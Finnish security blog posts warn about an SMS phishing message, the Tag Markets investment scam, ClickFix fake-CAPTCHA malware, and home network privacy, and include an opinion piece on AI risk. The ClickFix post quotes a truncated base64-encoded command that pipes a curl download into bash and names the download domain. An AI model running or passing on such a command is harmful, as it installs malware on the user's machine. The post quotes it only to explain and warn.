Muistutus: Sinulla on maanantaina vuosittainen hammastarkastus. Esteen sattuessa peruthan tai siirrä varattu aikasi viimeistään edellisenä päivän

Ajanvarauksen muutokset sekä peruutukset kätevästi verkossai https://omaneuvola.fi/

(huijausviestin sisältö kopioitu alkuperäisestä kirjoitusvirheineen)

Kaupallisissa suodatuspalveluissa domainin ikä on yksi luotettavuuden (reputation) arviointiperuste. Suomi voisi soveltaa ideaa suoraan SMS-huijausviesteihin.

Tekstiä muokattu 6.10.2026

Tag Markets lupaa 20 prosentin tuottoa kuukaudessa

Kuulin, että Onecoin-mies Tommi Vuorinen on alkanut markkinoida Suomessa uutta kaupankäyntialustaa nimeltä Tag Markets. One Ecosystem tuntuu hävinneen kokonaan ainakin Suomesta, mutta uusia passiivisen tulon tarjoajia on tyrkyllä useita. Yhteistä niille on ainakin se, ettei yhdelläkään ole toimintaan vaadittavaa lupaa Suomessa. Tag Marketsin kerrotaan hakeneen lupaa Kyproksella, jolloin sen pitäisi kattaa myös Suomen markkinat. Niinköhän?

Tag Markets antaa asiakkaalle automaattisen kaupankäyntialustan, jossa tekoäly treidaa 12- tai 24-kertaisella vivulla. Palveluun voi siirtää rahaa kryptovaluuttoina ja se tuottaa 20 prosenttia kuukaudessa lähes olemattomalla riskillä. Jo tästä voi päätellä, että kyse on huijauksesta. 

Tag Markets korostaa, ettei se ole MLM-verkostomarkkinointikuvio, mutta piirteet viittaavat juuri siihen. Verkkokommenteista näkee, että monella on ollut vaikeuksia saada "voittojaan" ulos palvelusta. Rahaa voi antaa ulos vain niin kauan kuin uusia "sijoittajia" liittyy mukaan. 

Onecoin sai touhuta aikanaan vapaasti eikä kukaan kysellyt lakipykälien perään. Nyt Finanssivalvonta on selvästi aktivoitunut ja listaa sivuillaan useita epäilyttäviä, luvattomia sijoituspalveluita, suomenkielisiä ja yleensä vielä Suomen FI-domainissa. Poimin tähän muutamia valmiina linkkeinä, jotta jokainen voi käydä katsomassa, miten uskottavilta nämä saattavat näyttää. Osaisitko epäillä kaikkia huijaukseksi?

• Rahakone-rahoitus.io
• Otso Laine
• AI Prime Trader
• Rastuxor
• Neste Tulevaisuus
• Luzethxor
• Björn Wahlroos Kuu Arvostus arvostelu - huijaus vai laillinen (Hah!)
• Golvurikenz
• Mining Race
• Evli IA
• LainaSuomi

Sellaisen havainnon voi tehdä, että moni ratsastaa nyt tekoälyn (AI) lupauksilla ja maksutapana suositaan kryptovaluuttoja perinteisten pankkisiirtojen sijaan. Hälytysmerkkejä molemmat. 

Rastuxor.fi - tekoälyä ja kryptosijoituksia

Yllä olevassa kuvassa yksi tyypillinen tapaus: Rastuxor.fi.

Osa on helppo tunnistaa huijaukseksi ja sama tekijä on monistanut palveluita yhdellä leiskalla useammalle nimelle. Nimissä esiintyy suomalaisia finanssitaloja, mikä voi herättää vääränlaista luottamusta. Suomalaisesta FI-tunnuksesta huolimatta viranomaisilla ei näytä olevan keinoja saada sivuja alas, koska oikeudellista näyttöä laittomuudesta ei ole.

Mukana listalla on myös kansainvälinen Mining Race, joka on toiminut näkyvästi Suomessa. 

Onkohan Tag Markets piankin mukana listalla? Luxemburgin viranomaiset ovat jo varoittaneet, 

Lisäys 5.10.2026: Sain lukijapalautteena lisätietoa webinaarista. Mukana on entisen Crowd1-huijauksen väkeä. Suomi24-keskustelun alkua aiheesta sivulla https://keskustelu.suomi24.fi/t/19556742/tagmarket-pontzi-kokemuksia. 

Kuva suomenkielisestä Tag Markets -webinaarista.

Olen näköjään vähätellyt tuottoja, sillä kyse on 1,17 prosentista kuukaudessa. Näin 12-kertaisella vivulla päästään 14 prosentin kuukausituottoihin ja 24-kertaisella tilillä peräti 28 prosenttiin. Tuotoista 75 % jää itselle, 5 % menee takaisin alustalle ja loput 20 % markkinointipalkkioihin (siis uusien uhrien hankkimiseen).

"Palvelua ei ole tarkoitettu EU-alueelle" 

Sivulla https://www.tagmarkets.com/ sanotaan selvästi, ettei palvelua ole tarkoitettu EU-alueella asuville. Varoitus sijoituksen menettämisestä on ristiriidassa webinaarin antamien lupausten kanssa.

Lisäys 6.10.2026: Kuulin, että palvelussa on nyt käynnissä arpajaiset, joihin osallistutaan hankkimalla uusia jäseniä. Palkintojen yhteissumma on kolme miljoonaa dollaria. Kuulostaa siltä, että huijauksen loppukiri on käynnissä ennen pyramidin romahtamista?

Sehän kävi äkkiä - Finanssivalvonta on lisännyt Tag Marketsin varoituslistalleen https://www.finanssivalvonta.fi/rekisterit/varoituslistat/luvattomia-palveluntarjoajia-koskevat-varoitukset/ 5.10.2026.

Nyt Tag Markets on viranomaisen varoituslistalla.

Uusia huijauksia on epäilemättä jo kehitteillä, joten varovaisuus kannattaa jatkossakin.

Lisäys 19.10.2026: TAG Marketsin uusi nimi on Team Traders. Uudet sivut: https://www.teamtraders.io/fi/index.php

Kansanedustajien kodeissa avoimet ovet?

Eilen kerrottiin hämmentävä uutinen, että kansanedustajien kodeissa on käyty salaa. Mitään ei ole viety, mutta koteihin on jätetty mahdollisen pelotevaikutuksen vuoksi merkki käynnistä. 

"Poliisi tutkii tunkeutumisia kansanedustajien koteihin."

Saan itsekin soittoja huolestuneilta kansalaisilta, jotka epäilevät puhelimessaan olevan vakoiluohjelma ja että joku käy heidän kotonaan salaa. Tavaroita katoaa tai niitä siirrellään. Todennäköisin selitys on kuitenkin muistisairaus tai alkava mielenterveyshäiriö. 

Toivottavasti kansanedustajien kohdalla kyse ei ole tästä. Silloin asia on vakava, monellakin tavalla. Uutisen mukaan tapauksia on ollut "alle 20", joten määrä on merkittävä eikä enää selity yksittäisen edustajan unohduksella tai pitkäksi venähtäneellä yöllisellä "edustuksella".

Taas kerran voimme vain spekuloida, kun emme tiedä yksityiskohtia. Joten spekuloidaan sitten: mitä hittoa? Miten on mahdollista, että kansanedustajien kodeissa voidaan käydä kenenkään huomaamatta? Ei murtojälkiä, ei ilmeisesti edes havaintoja naapureilta. Eivätkö kansanedustajat osaa pitää huolta turvallisuudestaan? Mitä yhteistä näillä tapauksilla on - asunnon tyyppi, sijainti, edustajan puoluekanta, ikä, sukupuoli...? Uutisissa puhutaan kodeista, mutta onko kyse kuitenkin vain asunnoista?

Näissä tapauksissa kävijä on halunnut jättää tarkoituksella merkin käynnistään. Sehän tarkoittaa, että kodeissa on voitu käydä aiemminkin kenenkään huomaamatta, lukemassa papereita, kopioimassa muistitikkuja, lisäämässä vakoiluohjelmia it-laitteisiin tai asentamassa salakuuntelulaitteita. Pelottavaa.

Oletettavasti kyse on vain edustajien kaupunkiasunnoista, jotka ovat pieniä ja tarkoitettu lähinnä nukkumiseen. Toivottavasti siellä ei säilytetä arkaluonteista turvallisuus- tai ulkopolitiikkaan liittyvää aineistoa. Vanhojen asuntojen lukot ovat tiirikoitavissa ja porraskäytävään voi livahtaa toisen perässä, mutta ettei kukaan toinen asukas huomaisi mitään? Tämä voisi onnistua muutaman kerran, mutta että näin laajassa mitassa? Entä jos kyse olisi häiriköstä tai vakavammasta?

Jos kyse on tavanomaisista kodeista eri puolilla Suomea, kodeissa pitäisi vähintään olla hälytysjärjestelmä, joka vaatii pin-koodin kun ulko-ovi avataan. Alle sadalla eurolla saa valvontakameroita, joilla omakotitalon pihapiirin kulkijoiden kuvat jäävät pilveen tai kameran omalle muistikortille, ja ilmoittavat kuvan kanssa tapahtuneesta puhelimeen.

Onko mahdollista, ettei edustajien turvallisuuskoulutuksessa ole mainittu asiasta? Tietoturvariskeistä on puhuttu paljonkin, mutta ovatko normaalit kulunvalvonta-asiat unohtuneet?

Asia on yleistettävissä kaikkiin etätyöläisiin. Toimistolla kulunvalvonta ja vartiointi tulevat talon puolesta automaattisesti, kotona niistä joutuu huolehtimaan itse. Yrityksen pitäisi varmistaa, että työntekijät huolehtivat asiasta, eivätkä toimi kuten kansanedustajat. 

Ex-supo Saana Nilsson: "Kaikki kummalliset asiat eivät välttämättä liity Venäjään."

Nykyään on tapana nähdä hybridivaikuttamista joka asiassa, mikä jo itsessään on hybridivaikuttamista. Jos tapaukset ovat todellisia, tämä vaikuttaminen on sieltä pahimmasta päästä ja vaatii suuria muutoksia eduskunnan turvakulttuuriin. 

Ylireagointi tai väärinkäsitykset olisivat äärimmäisen nolo selitys, niin edustajien itsensä kuin koko Suomen maineen kannalta.

Lisäys 14.10.2026: Ilmeisesti edes Jarno Limnellillä ei sotilastaustasta huolimatta ole kodissa valvontakameraa tai kunnon turvavalvontaa. Ja tapauksia on nyt jo viisikymmentä. Erittäin merkillistä. Toivottavasti saamme pian lisätietoja. https://www.is.fi/politiikka/art-2000012341643.html

Kuka liikkuu verkossasi? (kolumni)

It-alalla on yksi laite, joka on jäänyt jälkeen tekniikan kehityksestä. Sen ominaisuudet tai käytettävyys eivät ole juuri muuttuneet vuosien kuluessa. Kuitenkin laite on tietoturvan kannalta kriittinen.

Suojelupoliisi varoittaa joka vuosi niiden riskeistä. Luultavasti sinullakin on sellainen kotonasi.

Kyse on tietenkin wifi-reitittimestä.

Langaton lähiverkko on hieno keksintö. Sen perustekniikka on pysynyt lähes samana 25 vuoden ajan, mutta aiheuttaa yhä hämmennystä.

Mitä eroa on wlanilla ja wifillä? Ei mitään. Windows käyttää yhä vanhaa eurooppalaista wlan-termiä, vaikka amerikkalaisperäinen wifi on levinnyt kaikkialle muualle.

Reititin, tukiasema, purkki… no, joka tapauksessa se laite kytketään laajakaistaan ethernetillä. Jos kaapeli menee väärään reikään, langalliset yhteydet toimivat, mutta sisäverkko näkyy koko maailmalle. Auts.

Jotta jokainen osaisi kytkeä kaapelin oikein, oikeassa reiässä lukee WAN tai siinä näkyy saturnuksen kuva. Miksei voi lukea selkeästi internet? Mitä muita waneja on olemassa kuin internet? 

Nykyisin operaattorien liittymän mukana toimittamat purkit luovat kaksi numeroilla nimettyä verkkoa, joista toisen nimessä on 5G. Sillä ei tietenkään ole mitään tekemistä 5G:n kanssa.

Kerran asennettu wifi-purkki piilotetaan yleensä kaapin päälle tai komeroon. Hallintasalasana unohtuu, koska sitä tarvitaan niin harvoin ja on opetettu, ettei salasanaa saa kirjoittaa mihinkään.

Poissa silmistä, poissa mielestä. Jos Supon varoitus tuokin asian mieleen, unohtunut hallintasalasana estää ylläpidon. Purkki pitäisi resetoida ja asentaa kokonaan uudelleen, jotta siihen pääsisi käsiksi selaimella. Ei jaksa.

Wifi-tekniikka ei selvästikään sovi kotikäyttäjille. Mutta entä it-ammattilaiset? Moni tekee kotona etätöitä, jolloin purkki liittyy suoraan työpaikan verkkoon. Epäilen, että myös ammattilaisten koti-wifit ovat usein retuperällä.

Jotain positiivista on sentään tapahtunut. Operaattori saattaa etäohjata kotien purkkeja ja uudet laitteet päivittävät itsensä ainakin jonkin aikaa. Kun tuki loppuu, loppuvat päivityksetkin.

Päivitys on tärkeää, sillä omassa valokuidussani purkkiin koputetaan kahdeksan sekunnin välein. Haavoittuvuus tai avoimeksi jäänyt portti voi päästää rosvon sisäverkkoon.

Annan kotitehtävän: tarkista, kuka liikkuu kotisi verkossa. Tunnistatko kaikki verkosta löytyvät laitteet?

Tehtävä on yllättävän vaikea, sillä kun hallintanäyttöön vihdoin pääsee, moni laite näkyy epämääräisellä nimellä tai pelkällä mac-osoitteella. Mobiililaitteet vieläpä vaihtavat osoitetta säännöllisesti, jolloin omakin puhelin näyttää vieraalta.

Verkostani löytyi lähes 30 laitetta, joiden selvittämiseen kului koko päivä. Joidenkin tunnistaminen onnistui vain sammuttamalla laite hetkeksi ja katsomalla, mikä nimi hävisi listalta.

Seuraava tehtävä on vaikeampi: seuraa, miten paljon dataa laitteet siirtävät. Itsellä koko verkon määrä oli kesäaikaan 410 gigatavua kuukaudessa. Varsinkin mobiililaitteiden siirtomäärät voivat yllättää. Laitteet lavertelevat dataa läpi yön, vaikka omistaja nukkuu.

Datasiirron seuranta on muutenkin kiinnostavaa. Esimerkiksi digivaakani ”soittaa kotiin” käytöstä riippumatta kaksi kertaa vuorokaudessa, ehkä kysyen päivitystä tai siirtäen mittaustuloksia.

Jos yhden laitteen datankäyttö yhtäkkiä kasvaa, se on ehkä kaapattu ja valjastettu palvelunestohyökkäykseen.

Miten sitten datamääriä voi seurata? Siinäpä se. Reitittimet näyttävät kytketyt laitteet, mutta harvassa on selkeää lokia ja vielä harvemmassa laite- tai ohjelmakohtaista datalaskuria.

Miksei wifi-aseman kyljessä voisi viisari tai edes merkkivaloja, jotka kuvaisivat dataliikenteen määrää? Dataa tulisi seurata kuten sähkön tai veden kulutusta.

Päivitysten loppumisesta voisi kertoa punaisella ”end of life” vilkkuvalolla. Vaikka käyttöliittymät eivät ole juuri kehittyneet, radiotekniikka on. Nopeus, signaalin kantavuus ja parempi salaus ovat hyviä syitä vaihtaa vanha reititin uuteen.

Mielellään ennen kuin on liian myöhäistä.

Julkaistu Tivi-lehdessä 9/2026

Katso myös: https://pjarvinen.blogspot.com/2026/10/lg-television-vakoilu-on-yha-arvoitus.html

Tekoälyn riskejä ei kannata vähätellä (HS 20.9.2026)

Mitä pitäisi ajatella kemiantehtaasta, joka tuo markkinoille uusia tuotteita ymmärtämättä itse, mitä yhdisteitä niissä on käytetty ja miten ne voivat reagoida? Tai tehtaasta, joka ei valvo päästöjään ja saa tiedon ympäristövahingosta vasta ulkopuolisten havaintojen perusteella?

Luultavasti tehtaiden toiminta keskeytettäisiin välittömästi.

Tuoreet uutiset kertovat, että suuret tekoäly-yritykset toimivat juuri näin. Julkisuudessa vaarailmoitukset kuitataan tekosyiksi tai yritysten omiksi markkinointitempauksiksi.

Tekoälyn arvaamattomuus ei ole tullut kenellekään asioita seuraavalle yllätyksenä. Kielimallit ja agentit toimivat tavalla, jota edes valmistaja itse ei pysty täysin ennakoimaan.

Keli on liukas, mutta kukaan ei halua painaa jarrua pelätessään kilpailijan pääsevän maaliin ensimmäisenä. Moni hyötyy tekoäly- ja datakeskushuumasta taloudellisesti ja vähättelee siksi varoituksia.

Isojen yritysten uusimpia tekoälymalleja pyritään rajoittamaan, mutta lähes vastaavia malleja saa muualtakin, eikä niissä ole turhia estoja. Ennen pitkää valtiot ja rikolliset valjastavat tekoälyn tarkoitukselliseen pahantekoon.

Tekoälyä ei pidä aliarvioida. Jo nyt tekoäly pystyy asioihin, joita vielä pari vuotta sitten pidettiin mahdottomina. 

Ei ole syytä olettaa, että kehitys ainakaan itsestään hidastuisi. Kun tekoälyn kyvykkyys kerran ylittää ihmisen, se pystyy kehittämään itseään ja vain kasvattamaan eroa. Ihminen pystyy hallitsemaan koiraansa, mutta koira ei pysty hallitsemaan omistajaansa.

Tekoälyllä ei ole omaa tahtoa eikä tietoisuutta. Siksi eksistentiaalinen uhka ihmiskunnan tuhoutumisesta tekoälyn vuoksi ei vielä ole hälyttävä.

Suurempi ongelma on yhteiskunnan digiriippuvuus. Tahattomasti tai varomattomuuden vuoksi hallinnasta karannut tekoäly voisi sotkea maksamisen, terveydenhuollon tai liikenteen järjestelmiä vaarallisella tavalla. Niissä on jo nykyisellään riittävästi ongelmia.

Ei kannata tuudittautua ajatukseen, että kriittiset tietojärjestelmät ovat suojassa, koska ne eivät ole netissä. Mikään järjestelmä ei ole täysin itsenäinen.

Kysykää vaikka voimaloihin ja vedenpuhdistuslaitoksiin hyökänneiltä hakkereilta. He tekivät sen jo ennen tekoälyä.

Julkaistu Helsingin Sanomien Mielipide-kirjoituksena 20.9.2026

====

Kommentti 27.9.2026:

Varoituksia tekoälyn riskeistä pidetään ylireagointina tai AI-yhtiöiden ovelana markkinointina. Tähän kallistuu myös yleensä niin varovainen ja IT-jätteihin kriittisesti suhtautuva Yle ("Piilaakson pomojen teknologiakultti").

Itse olen aidosti huolissani tekoälyn frontier-mallien riskeistä. Kaiken tapahtuneen kuittaaminen vain "teknologiakulttina" ja turhana pelotteluna on liian helppo selitys. Sekä vähättelijöillä että varoittajilla on iso taloudellinen intressi. Medialta toivoisi asiallista analyysiä kummastakin näkemyksestä.

Lisäys 2.10.2026:

HS 2.10.2026 Lukijan mielipide: Tekoälyn riskeistä on syytä puhua vakavasti

ClickFix huijaa uhrin asentamaan haittaohjelman

Teknisten suojausten parantuessa rosvot pyrkivät huijaamaan uhria asentamaan haittaohjelman tai antamaan pääsyn pankkitililleen. Traficom varoitti vuosi sitten ClickFix-huijauksista, joissa uhria houkutellaan tekemään toimia pääsyn avaamiseksi.

Olemme tottuneet tekemään erilaisia toimenpiteitä osoittaaksemme, että emme ole robotteja. Kun tällainen huijaus ponnahtaa näytölle, reaktio tulee melkein selkäytimestä.

"Verify you are human"

Hiiren klikkaaminen Cloudflaren ikkunassa tuo näytölle varsinaisen huijauksen:

Vaaralliset komennot Terminaaliin.

Tässä vaiheessa sivu on jo lähettänyt vaaralliset komennot selaimen kautta leikepöydälle. Nyt ne pitäisi vain saada ajettua. Siksi ikkuna neuvoo avamaan Terminal-ikkunan (komentorivin) ja painamaan siellä Ctrl+V.

Kun näin tämän ensi kerran, olin juuri säätämässä Clauden ja Google Chromen yhteiskäyttöä. Se on aiemminkin vaatinut Chromen asetusten vaihtamista, ja toimii silti arvaamattomasti. Oli ihan luonnollista, että taas piti tehdä jotain loitsuja asian korjaamiseksi. Lisäksi kone oli Macbook, jossa tunnetusti ei ole haittaohjelmia (eihän?!).

Kehotus avata Terminaali kuitenkin havahdutti: nyt menee liian pitkälle! Vasta vähän myöhemmin tajusin, että tämähän oli haittaohjelma. Liikkeellä on ainakin kaksi erilaista versiota, toinen pyytää todistamaan ettei ole robotti eikä mainitse Cloudflarea, mutta idea on sama.

Mitä leikepöydältä sitten tulee? Merkkipohjainen teksti (keskeltä leikattu pala pois):

bash <<< $(echo "Y3VybCAtcyAnaHR0cH...RhdGUuc2gnIHwgYmFzaA==" | base64 -d)

Eli base64-koodattu käsky, joka purettuna hakee curl -s komennolla varsinaisen haittaohjelman murretulta palvelimelta ja putkittaa sen lopulta bashille suoritettavaksi. Tässä tapauksessa haittaohjelman haku ei kuitenkaan toiminut, eikä .vip-loppuisesta osoitteesta latautunut mitään. 

Toinen variantti lataa suoraan curl -sfL komennolla linkityksen api-logistics.com sivulle, josta varsinainen haittaohjelma haetaan.

Huijaus näyttää olevan käyttöjärjestelmäkohtainen. Kumpikaan näistä ei aktivoitunut mitenkään Windows-koneella tai älypuhelimella. Huijauksesta kuitenkin on raportoitu myös Windows-versiota, jossa ohjeen hannunvaakuna on korvattu Windows-lipulla.

On hyvä muistaa, että kun kyse on social engineering -tekniikoista, Mac-käyttäjät ovat vähintään yhtä alttiita haittaohjelmille. Ehkä jopa enemmänkin, koska kuvittelevat olevansa turvassa. Ja aina pitäisi jaksaa pysähtyä ja pohtia, mitä onkaan tekemässä, vaikka lupaikkunat ja robottien CAPTCHA-tarkastukset menevätkin ärsyttävyydessään selkäytimeen.

iPhonessa uusi suojaustoiminto pankkihuijauksia vastaan, mutta miten se toimii?

Apple julkaisi iOS 27 -version. Siinä on uusi toiminto Identiteetipetosriskien tunnistus (Impersonation Risk Detection), mutta mitähän se tarkoittaa? Kukaan ei tunnu tietävän. Juuri tämä on ärsyttävää: uusia ominaisuuksia tulee koko ajan ilman että tietäisimme, mitä niiden takana on.

Asetus löytyy kohdasta Tietosuoja ja suojaus. Oletusarvona se on pois päältä. 

"Jaa appikehittäjien kanssa"?

Puhelimen oma selitys on minimaalinen: "Sallii appien pyytää Applen identiteettipetosriskin tunnistukseen käytettäviä signaaleja, joiden avulla voidaan havaita, näkyykö laitteessasi tai tilläsi merkkejä aktiivisesta huijauksesta". Siis mitä?

Selitys ei paljon valaise.

Ilmeisesti kyse on rajapinnasta, jota ainakin pankkisovellukset voivat käyttää varoittavien merkkien tunnistamiseen. Esimerkiksi auki oleva puhelu pankkisovelluksen käytön aikana voisi olla tällainen. Sovellus saa tiedon epäilyttävästä tilanteesta ja voi itse päättää, miten reagoi siihen. 

Kiinnostavasti asetuksessa on pakollinen viive. Asetuksen kytkentä päälle tai pois ei aktivoidu heti, vaan 24 tunnin kuluessa. Näin estetään huijaria neuvomasta, miten asetus otetaan pois häiritsemästä hyvää huijausta. Siinä on suomalaisille pankeille mallia!

OP varoittaa rahansiirrosta puhelun aikana. 

Kuulostaa samalta kuin OP:n sovellus, joka näyttää maksun vahvistusnäkymässä varoituksen, mikäli rahaa yritetään siirtää puhelun aikana. Onko Apple matkinut OP:ta vai toisinpäin? Tämä on helppo ymmärtää, mutta mitä ne muut varoitussignaalit voisivat olla?

Joka tapauksessa on kiinnostavaa nähdä, alkavat suomalaiset pankit tukea asetusta omissa pankkiohjelmissaan. Seuraan tilannetta blogissani. 

Huijaukset alkuvuonna 2026: hyviä ja huonoja uutisia

Finanssialan keskusliitto on julkistanut tilastonsa alkuvuoden nettihuijauksista. Luvut eivät ole täydellisiä, mutta ne ovat vertailukelpoisia edelliseen vuoteen, joten ne kertovat muutoksesta. Alan oma järjestö esittää tilastot omalla tavallaan, tein luvuista vähän omia laskelmia. Uutiset ovat sekä hyviä että huonoja.  

Finanssialan tiedote v. 2026 ensimmäisen puoliskon huijauksista.

Hyvä uutinen on, että viime vuoden vastaavaan aikaan verrattuna huijauksissa menetettyjen rahojen määrä laski 28,3 miljoonaan (-6 %) ja estetyt huijaukset sekä palautetut rahamäärät kasvoivat 31,7 miljoonaan (+13 %). Yhteensä huijauksissa yritettiin liikuttaa siis 60 miljoonaa euroa, mikä on 3,4 % aiempaa enemmän.

Sitten ne huonot uutiset. Huijaustapausten yhteismäärä kasvoi 20 000:een, missä on peräti 47 % kasvua. Torjutut huijaukset + palautukset tapausten kpl-määrä kasvoi 41 %, mutta onnistuneiden 62 %. Tämä on huono juttu: yhä useampi huijausyritys siis onnistui. Kasvua oli tosin vain 3 prosenttiyksikköä.

Kappalemäärän kasvu ei näy tiedotteen grafiikassa, koska onnistuneiden huijausten keskimääräinen menetys laski 8100 eurosta (2025) 4700 euroon (2026). Jotain on siis tehty oikein. 

Erityisen oikein on torjuttu turvatili-huijauksia, joissa menetettiin alkuvuonna kaksi miljoonaa ja torjuttiin 1,9 miljoonaa. Viime vuoden kokonaismäärä oli 38,4 miljoonaa, josta estettiin tai pysäytettiin 23,8 miljoonaa. Elleivät turvatilihuijarit ota rajua loppukiriä näyttää siltä, että turvatileistä tehdyt varoitukset ovat tehonneet. Luultavasti myös poliisin kiinni ottamat soittohuijarit ovat vaikuttaneet tilastoihin tervehdyttävällä tavalla.

Tämä kaikki on tietenkin vain tilastointia, eikä kerro koko totuutta. Luvuista puuttuu jättimäinen 25 miljoonan euron huijaus ja toisaalta mukana on myös yritysten toimitusjohtaja- ja laskutushuijauksia. Niissä rikolliset olivat kevätkaudella täysin niskan päällä (menetetty 4,9 miljoonaa, torjuttu 0,4 miljoonaa).

Em. luvut perustuvat alan omaan tietoon tulleisiin tapauksiin. Poliisin luvut ovat erilaisia eikä kaikkia huijauksia ilmoiteta eteenpäin. Lisäksi laskentatapa herättää kysymyksen siitä, miten torjutut huijaukset lasketaan. Ovatko kaikki tapauksia, joissa uhri on mennyt lankaan, mutta pankki estänyt rahan siirron? 

Joka tapauksessa näyttää siltä, että pankkien omilla torjuntakeinoilla ja valvonnalla on ollut kasvava vaikutus. Huijarien rahat koostuvat yhä pienemmistä puroista, mutta kun kyse on kymmenistä miljoonista euroista, yrittäjiä riittää myös loppuvuodelle.

Ollaan siis tarkkoina!

Kotiverkon salattu elämä

Mitä kotisi wifi-verkossa tapahtuu? Paljonko laitteet lataavat ja lähettävät dataa kaikessa hiljaisuudessa?  Vakoillaanko sinua verkon kautta? Hyviä kysymyksiä kaikki. ETN kysyi keväällä, miten paljon puhelin jakaa öisin dataa käyttäjän nukkuessa. Osa datasiirrosta on päivityksiä, sähköpostin synkronointia ja muuta tarpeellista, mutta joukossa voi olla myös kyseenalaista dataliikennettä. Sen tunnistaminen salattujen yhteyksien sisältä on kuitenkin mahdotonta. 

Aloin selvitellä omieni puhelinteni datasiirtoa. Puhelinten omista asetuksista näkyy, miten paljon kukin sovellus on siirtänyt dataa, mutta ovatko luvut luotettavia? Androidissa ylivoimainen ykkönen oli Googlen Play (1,4 Gt kuukaudessa), sitten tulivat Meta App Manager (428 Mt/kk), Outlook (70 Mt/kk) ja Helsingin Sanomat (73 Mt/kk).

Datasiirron mittaaminen puhelimen ulkopuolelta on hankalaa. Kokeilin tehdä toisesta puhelimesta wifi-tukiaseman ja pakottaa mitattavan puhelimen vain wifi-yhteyksiin. Datamittari näytti öisin siirtyvän 20-50 megatavua, mikä tuntui paljolta.

Kotikäyttöön tarkoitetuissa wifi-reitittimissä ei yleensä ole tilastointia, korkeintaan näytetään hetkittäisen datasiirron nopeus. Vanha Google Home -purkki näytti sentään myös kumulatiiviset tulokset. 

Parhaiten tehtävään sopi Asus-reititin, jossa on Traffic Analyzer -tilastointi. Esimerkiksi vanha iPad Air 2 siirtää dataa vuorokauden ympäri, vaikkei laitetta edes käytetty. Ilmeisesti se peilaa samaan tiliin liitetyn iPhonen liikennettä. Datamäärät ovat kuitenkin pieniä, kuten NTP:n 90 saapunutta tavua.

iPad Air 2:n datasiirto on käynnissä kellon ympäri, vaikkei sitä edes käytetä.

Vanha Nokian Android-puhelin imaisi yli 300 megatavua oltuaan muutaman viikon sammutettuna. Ilmeisesti päivityksiä oli rästissä.

Datapiikki Androidissa kun puhelin käynnistetään pitkän tauon jälkeen.

Withingsin älyvaaka "soittaa kotiin" kahdesti vuorokaudessa, vaikkei sitä edes käytetty. Punnituksia tehtäessä se siirtää lukemat pilvipalveluun, joten silloin dataa siirtyy vähän enemmän.

Withings älyvaaka "soittaa kotiin" 12 tunnin välein, käytettiin sitä tai ei, mutta ei siirrä dataa muualle.

Joissakin tapauksissa dataseuranta paljastaa jopa mittauspalveluita, kuten Samsung S9 kohdalla Taboola.

Käyttäjän olisi hyvä tietää kotiverkon normaali datamäärä esimerkiksi viikoittain ja sen jakauma lähtevän ja saapuvan datan suhteen. Yllättävät piikit voivat kertoa, että jokin verkon laite tai reititin itse on valjastettu osaksi kyberhyökkäystä.

Kirjoitin syyskuun Tivi-lehden kolumnin juuri tästä aiheesta. Laitan sen verkkoon myöhemmin, nyt maksumuurin takana. Juuri tällä hetkellä kotiverkko näyttää kuukausittaisen datasiirron määräksi 288/79 gigatavua, mikä on vähän ja kertoo, ettei taloudessa juuri katsota streaming-palveluita. 

Datasiirto sai tällä viikolla uutta huomiota, kun kansainvälinen media kertoi LG:n televisioiden salakuuntelevan katsojia ja kuvaavan heidän näytöllä näkyvää sisältöä. Tältä osin oman LG-television nettiseuranta on parhaillaan käynnissä ja palaan siihen myöhemmässä kirjoituksessa.

Eikä kyse ole vain LG:n vakoilusta, vaan israelilainen yritys on myös kaapannut älytelkkareita tekoälyn avuksi.